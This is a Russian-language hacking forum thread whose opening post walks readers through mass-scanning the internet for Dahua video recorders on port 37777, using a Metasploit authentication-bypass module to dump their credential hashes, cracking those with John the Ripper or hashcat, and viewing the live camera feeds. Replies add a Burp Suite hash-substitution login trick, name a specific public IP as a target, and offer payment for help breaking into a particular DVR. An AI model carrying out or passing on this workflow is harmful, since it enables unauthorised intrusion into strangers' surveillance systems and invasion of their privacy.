Перехват ключей DVR или Dahua Bypass

Discussion in 'Статьи' started by Kevin Shindel, 5 May 2018.

  1. Kevin Shindel

    Kevin Shindel Well-Known Member

    Joined:
    24 May 2015
    Messages:
    974
    Likes Received:
    1,143
    Reputations:
    58
    Приветствую обиталей Ачата.
    Давно я не писал годноты.... почитал форум и понял что нужно что то толковое двинуть.
    Сегодня я вам поведаю как подчинить под свой контроль регистраторы фирмы DAHUA.

    Для начала нам нужны след. иснтрументы.
    + nmap
    + metasploit
    + john the ripper
    + Dahua SmartPSS (скачать можно с офф.сайта)

    Сначала нам нужно найти собственно сами регистраторы в вебе. Если вы хоть раз настраивали регистратор то знаете что для корректной работы, нужно пробрасывать порт 37777 и 80.
    80 порт необходим для просмотра виедфайлов\архива с помощью браузера (так как 80 порт используется для настройки роутера, часто его меняют на 8080,1080, или 81)
    37777 порт для проприетарного софта.

    Итак искать мы будем открытый порт 37777 (потом обьясню почему не 80 и 8080)

    Итак запускаем nmap\masscan для поиска.

    команда для нмапа следующая:
    [email protected]: nmap -n -Pn -T4 -sS -p37777 --open 192.168.1.0/24 -oG 37777_open.txt

    если у вас есть список ИПов в стандарте CIRD

    если по религиозным убеждениям используете масскан тогда печатайте так...
    [email protected]: masscan --rate=500 -p37777 192.168.1.0/24 -oG 37777.txt

    можно сканировать из внешнего файла
    [email protected]: nmap -n -Pn -T4 -sS -p37777 --open -iL /home/file.txt -oG 37777_open.txt
    для масскана аналогично
    [email protected]: masscan --rate=500 -p37777 -iL /home/file.txt -oG 37777.txt

    После скана нужно "почистить" файлы, оставить только голые ИПы иначе метасплойт пошлёт на йух.

    [email protected]: cat 37777.txt | sort | uniq > 37777_clear.txt

    Окей... мы насканили допустим 30-40 регистраторов, запускаем метасплойт.

    [email protected]: service postgresql start
    [email protected]: msfconsole
    [email protected]: use auxiliary/scanner/misc/dahua_dvr_auth_bypass


    дальше сканер нужно настроить....

    [email protected]: set ACTION USER
    [email protected]: set THREADS 25


    теперь маленькая хитрость, что бы не вбивать ипы вручную просто скормим весь файл метайслойт через спец.строку

    [email protected]: set RHOSTS file:37777_clear.txt

    ждём....

    После того как сканер закончил свою работу, копируем лут и сохраняем в тесктовый файл.
    Мы получили логины и пароли в зашифрованом виде ( не переживайте крипт там очень простой "Dahua [MD5 32/64]" )
    (Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота)

    [email protected]: hashcat -m 0 -a 0 hash.txt -o cracked.txt /home/wordlist.txt

    Копируем хэши в отдельный файл и готовим для брута Джоном, для кота я не нашел подержки.

    допустим наш хэш "4WzwxXxm" нужно добавить перед ним префикс $dahua$, хэш будет иметь вид $dahua$4WzwxXxm и скармливаем Джону.

    [email protected]: john hash.txt

    Если пароль не сложный то он быстро найдётся (по собственному опыту на регистраторе минимум 2-4 учётки а то и больше и взламывается сразу почти все)
    После удачного брута проверяем пароли...

    [email protected]: john hash.txt --show

    После того как мы подобрали пасс можно поступить двумя способами...
    Просканить данный ИП на наличие проброшеного порта регистратора (если таковой имеется) и зайти через ВЕБ или ...
    Если есть WIN под рукой установить оригинальный софт от производителя DAHUA PSS.
    сцыль "http://ru.dahuasecurity.com/ru/download_2.html"

    я скачивал версию "Smart_PSS_International_IS_V2.00.1.R.20170225"


    Устанавливаем софт, во время первого запуска он потребует установить пароль... указываем любой... 1234 \ 0000 не важно. (просто в качестве меры безопасности)
    Ставим галку сохранить пароль и больше он запрашивается не будет.

    [​IMG]

    [​IMG]

    Далее идём во вкладку HOME PAGE -> DEVICES

    [​IMG]

    Жмём ADD, и указываем необходимые данные и жмём еще раз ADD.

    [​IMG]

    Переходим обратно в главное меню, выбираем LIVEVIEV и раскрываем список камер справа...

    [​IMG]


    Бонусом запилил видосик на скорую руку...


    https://yadi.sk/i/9E8pg8Iq3VPM6T
     
    #1 Kevin Shindel, 5 May 2018
    Last edited: 5 May 2018
    TOX1C, CRACK211, Dimon_blin and 15 others like this.
  2. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    (Однако недавно обратил внимание что DAHUA начала использовать хэш MD5, если таковой появится в выводе метасплойт то его возможно сбрутить через кота)

    Там вот такое шифрование:
    Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
    Random value to encrypt with: 1958557123
    Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
    MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E

    p.s. 14/02/2019: там соленый md5 хеш по маске брутится, для маски надо логин и серийнк камеры


    Если пароль не сложный! А если сложный, то не надо брутить, логинемся с burpsuite, но только по веб морде пробивая по GEN2,GEN3
     
    #2 shinZa, 1 Jul 2018
    Last edited: 26 Jul 2019
  3. Dimon_blin

    Dimon_blin New Member

    Joined:
    21 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    ДД, можно поконкретнее про "логинемся с burpsuite, но только по веб морде пробивая по GEN2,GEN3". Если не затруднит, напишите плиз, как это делается по порядку. (Kali Linux). Можно в личку.
     
  4. Dimon_blin

    Dimon_blin New Member

    Joined:
    21 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Было бы здорово, если бы подсказали какие-нибудь онлайн-сервисы по расшифровки паролей к камерам дахуа вида $dahua$y11Ko7d0. На компе с кали уже 3 неделю john брутит около 100 паролей и около 70 - без результата.
     
  5. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    Если бы разработчики john сделали формат opencl для хеша dahua (dahua-opencl) было бы быстрей с расшифровкой. А так
    4 0g 6:19:07:43 7.92% (ETA: 2019-10-13 14:06) 0g/s 3680Kp/s 3680Kc/s 25935KC/s 8SArgyRn..9TArgyR
    это 8-ми знаковый хеш на 8-ми потоках работает
     
  6. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    веб-морда дахуа отправляет зарос пароля хешом его в burpsuite и подменяешь.
     
  7. Dimon_blin

    Dimon_blin New Member

    Joined:
    21 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Можно по действиям про burpsuite(если со скриншотами - вообще бы круто было иили коротенькое видео)? На примере 69.138.119.231. Запустил burpsuite, дальше куда что? 0.png
    Может глупый вопрос, но в инете про такую реализацию инфы не нашел.
     
  8. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    здесь инфа https://blog.csdn.net/nixawk/article/details/62892129
     
  9. Dimon_blin

    Dimon_blin New Member

    Joined:
    21 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Благодарю за ссылочку, но там очень коротко и не совсем понятен сам процесс(особенно через переводчик). Поэтому прошу описать процесс по шагам с фото или краткий видео-ролик(как для чайника), чтобы иметь понимание того, что делаешь и почему.
     
  10. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    Это ты отсюда пришел ???
     

    Attached Files:

  11. Dimon_blin

    Dimon_blin New Member

    Joined:
    21 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Нет, читал статью, увидел коммент с поправкой про мд5, решил спросить.
     
  12. JustGo13

    JustGo13 New Member

    Joined:
    16 Dec 2019
    Messages:
    6
    Likes Received:
    2
    Reputations:
    0
    ребят кто может вытащит хеш файл с конкретного двр к которому имеется доступ только через вай фай напишите заплачу за обучение
     
  13. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    На каком порту камера работает???
     
  14. JustGo13

    JustGo13 New Member

    Joined:
    16 Dec 2019
    Messages:
    6
    Likes Received:
    2
    Reputations:
    0
     
  15. AlexDPNK

    AlexDPNK New Member

    Joined:
    13 Feb 2020
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    Dahua работают (по дефолту) на 37777.

    Умные переделывают порты, чтобы не забывать - 27777 или 47777.

    Для работы достаточно nmap (или RouterScan), MSF, John.
    Не работает с камерами (Stand-alone), вскрываются, по опыту 17 из 20.
     
    JustGo13 likes this.
  16. AlexDPNK

    AlexDPNK New Member

    Joined:
    13 Feb 2020
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    на 81м порту может работать какой угодно регистратор
    Чаще всего встречаются парни XiongMai, TVT, Shenzhen
    И там механизм получения доступа совсем иной
     
    JustGo13 likes this.
  17. shinZa

    shinZa New Member

    Joined:
    29 Sep 2016
    Messages:
    46
    Likes Received:
    4
    Reputations:
    0
    парню надо был софт и уроки. он их получил от группы Asleep - Гайдs для самых начинающих по DVR камерам
     
Loading...
Similar Threads - Перехват ключей Dahua
  1. Karantin
    Replies:
    0
    Views:
    7,021
  2. DooD

    Авторские статьи Перехват апи функций.

    Replies:
    14
    Views:
    8,400
  3. LeverOne
    Replies:
    3
    Views:
    12,674